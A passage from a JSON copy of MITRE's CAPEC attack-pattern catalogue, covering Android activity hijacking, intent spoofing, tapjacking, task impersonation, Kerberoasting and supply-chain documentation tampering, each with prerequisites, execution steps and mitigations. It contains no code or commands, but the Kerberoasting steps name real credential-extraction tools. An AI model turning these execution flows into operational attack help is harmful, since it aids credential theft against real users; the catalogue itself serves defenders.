filter"},{"Step":"3","Phase":"Experiment","Description":"[Get user to download malicious app] The adversary must get a user using the targeted app to download the malicious app by any means necessary"},{"Step":"4","Phase":"Exploit","Description":"[Gather sensitive data through malicious app] Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.","Technique":"Gather login information from a user using a malicious app"}]},"Prerequisites":{"Prerequisite":"The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity."},"Skills_Required":{"Skill":["The adversary must typically overcome network and host defenses in order to place malware on the system.",{"Level":"High"}]},"Resources_Required":{"Resource":"Malware capable of acting on the adversary\'s objectives."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An \'explicit intent\' is delivered to a specific application as declared within the intent, whereas an \'implicit intent\' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).","Never use implicit intents for inter-application communication."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"923"}},"References":{"Reference":{"External_Reference_ID":"REF-427","Section":"3.1.2 Activity Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Activity Hijack",{"Date":"2020-12-17"}]}},"502":{"ID":"502","Name":"Intent Spoof","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application\'s component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent\'s action without verififcation, then the target application performs the functionality at the adversary\'s request, helping the adversary achieve the desired negative technical impact.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents."},"Mitigations":{"Mitigation":"To limit one\'s exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller\'s identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component\'s exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller\'s identity prior to returning sensitive values."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-427"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"503":{"ID":"503","Name":"WebView Exposure","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView\'s addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"122","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-430"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"504":{"ID":"504","Name":"Task Impersonation","Abstraction":"Standard","Status":"Stable","Description":"An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user\'s privileges. When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary\'s goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred. A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user\'s privileges.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine suitable tasks to exploit] Determine what tasks exist on the target system that may result in a user providing sensitive information.","Technique":["Determine what tasks prompt a user for their credentials.","Determine what tasks may prompt a user to authorize a process to execute with elevated privileges."]},{"Step":"2","Phase":"Exploit","Description":"[Impersonate Task] Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user\'s privileges.","Technique":["Prompt a user for their credentials, while making the user believe the credential request is legitimate.","Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate."]}]},"Prerequisites":{"Prerequisite":["The adversary must already have access to the target system via some means.","A legitimate task must exist that an adversary can impersonate to glean credentials.","The user\'s privileges allow them to execute certain tasks with elevated privileges."]},"Skills_Required":{"Skill":["Once an adversary has gained access to the target system, impersonating a task is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["Malware or some other means to initially comprise the target system.","Additional malware to impersonate a legitimate task."]},"Indicators":{"Indicator":"Credential or permission elevation prompts that appear illegitimate or unexpected."},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help."},"Example_Instances":{"Example":["An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user\'s Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user\'s encrypted email.","An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user\'s privileges."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":{"External_Reference_ID":"REF-434","Section":"4.1.2 Man-In-The-Middle"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, @Status, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, Resources_Required, Skills_Required, Typical_Severity"}]}},"505":{"ID":"505","Name":"Scheme Squatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"},{"Exclude_ID":"512"}]}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible."},"References":{"Reference":{"External_Reference_ID":"REF-434","Section":"4.1.2 Man-In-The-Middle"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"506":{"ID":"506","Name":"Tapjacking","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"This pattern of attack requires the ability to execute a malicious application on the user\'s device. This malicious application is used to present the interface to the user and make the attack possible."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":[{"External_Reference_ID":"REF-436","Section":"4. New Browserless Attacks"},{"External_Reference_ID":"REF-437"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}]}},"507":{"ID":"507","Name":"Physical Theft","Abstraction":"Meta","Status":"Draft","Description":"An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.","Prerequisites":{"Prerequisite":"This type of attack requires the existence of a physical target that an adversary believes hosts something of value."},"Mitigations":{"Mitigation":"To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"508":{"ID":"508","Name":"Shoulder Surfing","Abstraction":"Detailed","Status":"Draft","Description":"In a shoulder surfing attack, an adversary observes an unaware individual\'s keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \\"over the victim\'s shoulder\\", as implied by the name of this attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"651","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]},{"Nature":"CanPrecede","CAPEC_ID":"560"}]},"Prerequisites":{"Prerequisite":"The adversary typically requires physical proximity to the target\'s environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording."},"Skills_Required":{"Skill":["In most cases, an adversary can simply observe and retain the desired information.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Likelihood":"High"}},"Mitigations":{"Mitigation":["Be mindful of your surroundings when discussing or viewing sensitive information in public areas.","Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information."]},"Example_Instances":{"Example":["An adversary can capture a target\'s banking credentials and transfer money to adversary-controlled accounts.","An adversary observes the target\'s mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.","An insider could obtain database credentials for an application and sell the credentials on the black market.","An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"200"},{"CWE_ID":"359"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"509":{"ID":"509","Name":"Kerberoasting","Abstraction":"Detailed","Status":"Stable","Description":"Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"652"},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Scan for user accounts with set SPN values","Technique":"These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means."},{"Step":"2","Phase":"Explore","Description":"Request service tickets","Technique":"Using user account\'s SPN value, request other service tickets from Active Directory"},{"Step":"3","Phase":"Experiment","Description":"Extract ticket and save to disk","Technique":"Certain tools like Mimikatz can extract local tickets and save them to memory/disk."},{"Step":"4","Phase":"Exploit","Description":"Crack the encrypted ticket to harvest plain text credentials","Technique":"Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack."}]},"Prerequisites":{"Prerequisite":["The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.","The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).","The adversary requires a brute force tool."]},"Skills_Required":{"Skill":{"Level":"Medium"}},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Monitor system and domain logs for abnormal access.","Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.","Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.","Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible."]},"Example_Instances":{"Example":"PowerSploit\'s Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1558.003","Entry_Name":"Steal or Forge Kerberos Tickets:Kerberoasting"}},"References":{"Reference":[{"External_Reference_ID":"REF-559"},{"External_Reference_ID":"REF-585"},{"External_Reference_ID":"REF-586"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-04-04"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Status, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"510":{"ID":"510","Name":"SaaS User Request Forgery","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user\'s session. This attack is executed after a trusted user is authenticated into a cloud service, \\"piggy-backing\\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user\'s privilege level.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the trusted user\'s system and convince the user to execute it while authenticated to the SaaS application."},"Skills_Required":{"Skill":["This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["To limit one\'s exposure to this type of attack, tunnel communications through a secure proxy service.","Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"346"}},"References":{"Reference":{"External_Reference_ID":"REF-438"}},"Notes":{"Note":["SaaS/Cloud applications are often accessed from unmanaged systems and devices, over untrusted networks that are outside corporate IT control. The likelihood of a cloud service being accessed by a trusted user though an untrusted device is high. Several instances of this style of attack have been found.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"511":{"ID":"511","Name":"Infiltration of Software Development Environment","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim\'s manufactured product further down in the supply chain.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).","The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.","The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure."]},"Skills_Required":{"Skill":["Intelligence about the manufacturer\'s operating environment and infrastructure.",{"Level":"Medium"},"Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.",{"Level":"High"},"Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim\'s workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"516":{"ID":"516","Name":"Hardware Component Substitution During Baselining","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component in the during the product development and research phase. This can lead to adjustments and calibrations being made in the product, so that when the final product with the proper components is deployed, it will not perform as designed and be advantageous to the attacker.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"The attacker will need either physical access or be able to supply malicious hardware components to the product development facility."},"Skills_Required":{"Skill":["Intelligence data on victim\'s purchasing habits.",{"Level":"Medium"},"Resources to maliciously construct/alter hardware components used for testing by the supplier.",{"Level":"High"},"Resources to physically infiltrate supplier.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle the what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the attacker an advantage when attacking the victim in that the attacker\'s presence may not be detected by the device."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"517":{"ID":"517","Name":"Documentation Alteration to Circumvent Dial-down","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation, which include descriptions of advanced technology and/or specific components\' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of internal software and hardware components within manufacturer\'s development environment.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to prevent dial-down capabilities.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker\'s home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"518":{"ID":"518","Name":"Documentation Alteration to Produce Under-performing Systems","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of software and hardware capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to misrepresent system capabilities.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"519":{"ID":"519","Name":"Documentation Alteration to Cause Errors in System Design","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of software capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to cause errors in system design.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer\'s documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \\"fail open\\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim\'s firewall."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE 